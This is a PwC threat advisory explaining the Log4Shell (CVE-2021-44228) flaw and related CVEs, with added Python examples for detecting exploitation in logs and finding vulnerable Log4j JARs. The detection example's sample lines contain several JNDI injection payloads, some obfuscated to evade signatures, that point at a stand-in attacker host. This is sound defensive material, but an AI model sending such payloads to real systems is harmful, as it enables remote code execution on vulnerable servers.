PWC Threat Intelligence - Log4j Explained - 17 Dec 21


Understanding the Log4j Vulnerability (CVE-2021-44228)

PwC Threat Intelligence

Updated December 17, 2021


"This is the most serious vulnerability I've seen in my career."

Jen Easterly
Director, United States Cybersecurity and
Infrastructure Security Agency (CISA)
Contents

Key points

Related vulnerabilities

Recommendations

Additional resources

Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021


PwC Threat Intelligence 3
Key Points

What is Apache Log4j?


Apache Log4j is a logging library written in the Java programming language. It is not a
standalone application or program: developers embed it inside broader systems and web
applications, which is why it is often present on a host without anyone having installed it deliberately.

How does this vulnerability work?


The vulnerability within Log4j (CVE-2021-44228, widely known as Log4Shell) allows an attacker to
execute code remotely on an affected system. Affected versions of Log4j 2 (2.0-beta9 up to and
including 2.14.1) evaluate lookup expressions such as ${jndi:ldap://host/path} inside the messages
they log, so any attacker-controlled string that reaches a log entry (an HTTP header, a username, a
chat message) can direct the application to a JNDI endpoint the attacker controls and load code from
it. Exploitation is trivial, exploit code is publicly available, and a successful exploit gives the
attacker the privileges of the logging application on the compromised system.
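To make the lookup mechanism concrete, the following Python model (an added example, not Log4j's own code and not PwC's) re-implements the ${...} substitution that affected Log4j 2 versions applied to every logged message, records the JNDI targets instead of contacting them, and runs it over constructed log lines. The same normalisation is what a log review for past exploitation attempts needs, because a literal signature such as `${jndi:` misses the obfuscated forms. The set of modelled lookups (lower, upper, env, jndi), the `env` dictionary and the sample lines are assumptions made for the demonstration.

```python
"""Simplified model of Log4j 2 message-lookup substitution (CVE-2021-44228).

Added example, not Log4j's own code. Only the lookups needed to show the
mechanism are modelled; the 'jndi' lookup is recorded, never performed, so
this runs safely offline. SAMPLE_LINES are constructed, not real log data.
"""
import re


def _matching_brace(text, start):
    """Index of the '}' closing the '${' opened just before start, or -1 if unbalanced."""
    depth, i = 1, start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def _lookup(inner, env, found):
    """Resolve one already-flattened lookup body such as 'lower:J' or 'jndi:ldap://x'."""
    var, default = (inner.split(":-", 1) + [None])[:2]   # ':-' introduces a default value
    key, _, arg = var.partition(":")
    key = key.lower()                                     # lookup names match case-insensitively
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if key == "env":
        return env.get(arg, default if default is not None else "${" + inner + "}")
    if key == "jndi":
        found.append(arg)                                 # vulnerable Log4j would contact this URL here
        return "[JNDI:" + arg + "]"
    # Unknown lookup: fall back to the default, otherwise leave the text untouched.
    return default if default is not None else "${" + inner + "}"


def resolve(text, env=None, found=None):
    """Expand ${...} lookups innermost-first; JNDI targets are appended to `found`."""
    env = env if env is not None else {}
    found = found if found is not None else []
    out, i = [], 0
    while i < len(text):
        if text.startswith("${", i):
            end = _matching_brace(text, i + 2)
            if end == -1:                                 # unbalanced: emit the rest verbatim
                out.append(text[i:])
                break
            inner = resolve(text[i + 2:end], env, found)  # nested lookups resolve first
            out.append(_lookup(inner, env, found))
            i = end + 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def jndi_targets(line, env=None):
    """Return the JNDI URLs a vulnerable Log4j build would have looked up for this line."""
    found = []
    resolve(line, env, found)
    return found


NAIVE_SIGNATURE = re.compile(r"\$\{jndi:", re.I)


def naive_match(line):
    """The kind of literal signature many early detections used; misses obfuscated payloads."""
    return bool(NAIVE_SIGNATURE.search(line))


def scan_lines(lines, env=None):
    """Return {line: [jndi targets]} for every line that would trigger a JNDI lookup."""
    hits = {}
    for line in lines:
        targets = jndi_targets(line, env)
        if targets:
            hits[line] = targets
    return hits


SAMPLE_LINES = [  # constructed for the demo; attacker.example is a placeholder host
    "GET / 200 UA=${jndi:ldap://attacker.example/a}",
    "GET / 200 UA=${${lower:J}${upper:n}di:${lower:LDAP}://attacker.example/b}",
    "GET / 200 UA=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.example/c}",
    "login failed user=${env:NO_SUCH_VAR:-${jndi:ldap://attacker.example/d}}",
    "login ok user=${ctx:user} from 10.0.0.5",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(f"naive={naive_match(line)!s:5} resolved={jndi_targets(line)} <- {line}")
```

Running the block shows the naive signature catching only two of the four malicious lines while the resolver flags all four, which is why log review for this vulnerability should normalise lookups before matching rather than grep for a fixed string.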

Why is this vulnerability so critical?


Log4j is in widespread use across numerous systems and applications. This
vulnerability is particularly concerning because exploitation is trivial, exploit code is publicly
available, and identifying Log4j in enterprise environments may be complex because it is usually
bundled inside other applications and appliances rather than installed separately. Additionally,
multiple threat actors are actively exploiting this vulnerability.

Related Vulnerabilities

CVE-2021-4104
Log4j 1.2 has a vulnerability that results in remote code execution in a similar fashion to
CVE-2021-44228. It is confined to the non-default JMSAppender and requires the attacker to be able to
modify the logging configuration, but Apache Log4j 1.2 reached end of life in August 2015 and will
not receive a fix.
https://nvd.nist.gov/vuln/detail/CVE-2021-4104

CVE-2021-45046
The fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default
configurations: logging configurations that use a Pattern Layout with a Context Lookup (for example
$${ctx:loginId}) or a Thread Context Map pattern, where the attacker controls the Thread Context Map
data. Initially this was assessed only as a denial of service vulnerability, but it was upgraded in
severity after remote code execution was shown to be possible.
https://nvd.nist.gov/vuln/detail/CVE-2021-45046

Recommendations

Understand your exposure
Identify systems across your enterprise that may be running vulnerable versions of Log4j. Because
Log4j is usually bundled inside other applications rather than installed on its own, check
application archives and vendor-supplied software as well as the systems you build yourself.

Validate that vulnerable systems have not been compromised
Exploitation of this vulnerability may have occurred as early as December 1, 2021. Review logs and
alerts from associated systems to ensure a compromise has not occurred.

Upgrade to Log4j 2.16.0
Recent analysis has shown that the changes in 2.15.0 do not fully mitigate the vulnerability
(CVE-2021-45046), so all systems should still be considered vulnerable unless 2.16.0 is deployed.
Where an immediate upgrade is not possible, Apache's security guidance (linked under External
Resources) is to remove the JndiLookup class from the log4j-core JAR on the classpath.

If you think you have been compromised
Activate your incident response (IR) plan or IR retainer.
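As an added example for the "understand your exposure" step (not PwC's or Apache's tooling), this Python script walks a directory tree, opens every JAR, WAR and EAR, including archives nested inside other archives, reads the Maven pom.properties that Log4j ships, and classifies each copy against the version thresholds above. The sample archives it builds under a temporary directory are constructed for the demonstration, and the finding labels are assumptions of this example, not terms from the advisory.

```python
"""Locate Log4j copies on disk and classify them against the advisory's thresholds.

Added example using only the Python standard library. Thresholds: Log4j 2 below
2.15.0 is vulnerable to CVE-2021-44228, 2.15.0 is the incomplete fix
(CVE-2021-45046), 2.16.0 and later are fixed, and any 1.x build is end-of-life
(CVE-2021-4104 applies only where JMSAppender is configured). The archives built
by make_sample_tree() are constructed test data, not real software.
"""
import io
import os
import tempfile
import zipfile
import re

# Entries inside a Log4j JAR that identify the library and its version.
LOG4J2_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
LOG4J1_POM = "META-INF/maven/log4j/log4j/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def parse_version(props):
    """Return (major, minor, patch) from a pom.properties 'version=' line, else None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", props, re.M)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def classify(version, has_jndi_lookup):
    """Map a version tuple to a finding label (labels are this example's own)."""
    if version is None:
        return "log4j-unknown-version"
    if version[0] == 1:
        return "log4j-1.x-end-of-life (CVE-2021-4104 if JMSAppender configured)"
    if version < (2, 15, 0):
        # Deleting JndiLookup.class is Apache's documented stop-gap for deployments that
        # cannot upgrade yet; report it, but keep the host on the upgrade list.
        if not has_jndi_lookup:
            return "vulnerable-version-JndiLookup-removed (verify, then upgrade)"
        return "vulnerable (CVE-2021-44228)"
    if version == (2, 15, 0):
        return "incomplete-fix (CVE-2021-45046)"
    return "fixed (>= 2.16.0)"


def inspect_archive(data, label, findings):
    """Inspect a ZIP-based archive held in memory, recursing into nested archives.

    Embedded copies of Log4j usually sit inside WAR/EAR files or fat JARs, so a scan
    that only looks at top-level file names misses exactly the hard-to-find cases.
    """
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        pom = LOG4J2_POM if LOG4J2_POM in names else LOG4J1_POM if LOG4J1_POM in names else None
        if pom:
            version = parse_version(zf.read(pom).decode("utf-8", "replace"))
            findings[label] = classify(version, JNDI_LOOKUP_CLASS in names)
        for name in names:
            if name.lower().endswith(ARCHIVE_EXTS):
                inspect_archive(zf.read(name), label + "!" + name, findings)


def scan_tree(root):
    """Walk root and return {archive-path: finding} for every Log4j copy found."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    label = os.path.relpath(path, root).replace(os.sep, "/")
                    inspect_archive(fh.read(), label, findings)
    return findings


def build_jar(path, entries):
    """Write a minimal ZIP with the given {name: bytes} entries (constructed test data)."""
    with zipfile.ZipFile(path, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)


def make_sample_tree():
    """Create a temporary directory of constructed archives covering each finding class."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    os.makedirs(os.path.join(root, "legacy"))
    cls = b"\xca\xfe\xba\xbe"  # placeholder class bytes; only the entry name matters here
    build_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"),
              {LOG4J2_POM: b"version=2.14.1\n", JNDI_LOOKUP_CLASS: cls})
    build_jar(os.path.join(root, "lib", "log4j-core-2.14.1-patched.jar"),
              {LOG4J2_POM: b"version=2.14.1\n"})  # JndiLookup.class deleted
    build_jar(os.path.join(root, "lib", "log4j-core-2.16.0.jar"),
              {LOG4J2_POM: b"version=2.16.0\n", JNDI_LOOKUP_CLASS: cls})
    build_jar(os.path.join(root, "legacy", "log4j-1.2.17.jar"),
              {LOG4J1_POM: b"version=1.2.17\n"})
    inner = io.BytesIO()  # a web application bundling Log4j 2.15.0 under WEB-INF/lib
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(LOG4J2_POM, b"version=2.15.0\n")
        zf.writestr(JNDI_LOOKUP_CLASS, cls)
    build_jar(os.path.join(root, "app.war"),
              {"WEB-INF/lib/log4j-core-2.15.0.jar": inner.getvalue()})
    return root


if __name__ == "__main__":
    for path, finding in sorted(scan_tree(make_sample_tree()).items()):
        print(f"{finding:65} {path}")
```

Point scan_tree at a real application directory to use it in anger; the nested-archive path label (outer!inner) tells you which deployable to rebuild, which matters because patching a JAR inside a WAR requires redeploying the WAR rather than replacing a file on disk.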
External Resources

Apache https://logging.apache.org/log4j/2.x/security.html

Microsoft https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/

CISA US https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance

NCSC UK https://www.ncsc.gov.uk/news/apache-log4j-vulnerability

ACSC AU https://www.cyber.gov.au/acsc/view-all-content/alerts/critical-remote-code-execution-vulnerability-found-apache-log4j2-library

Cyber CA https://cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability

JPCERT https://www.jpcert.or.jp/at/2021/at210050.html

CERT NZ https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/

ANSSI https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

GovtCERT CH https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

Contact us
Sangram Gayal
Partner, Cyber Security
sangram.gayal@pwc.com

Prashant Mehendru
Executive Director, Cyber Security
prashant.mehendru@pwc.com

www.pwc.in/consulting/cybersecurity.html

© 2021 PwC. All rights reserved. Not for further distribution without the permission of PwC. “PwC” refers to the network of member firms of PricewaterhouseCoopers
International Limited (PwCIL), or, as the context requires, individual member firms of the PwC network. Each member firm is a separate legal entity and does not act as
agent of PwCIL or any other member firm. PwCIL does not provide any services to clients. PwCIL is not responsible or liable for the acts or omissions of any of its
member firms nor can it control the exercise of their professional judgment or bind them in any way. No member firm is responsible or liable for the acts or omissions of
any other member firm nor can it control the exercise of another member firm’s professional judgment or bind another member firm or PwCIL in any way.
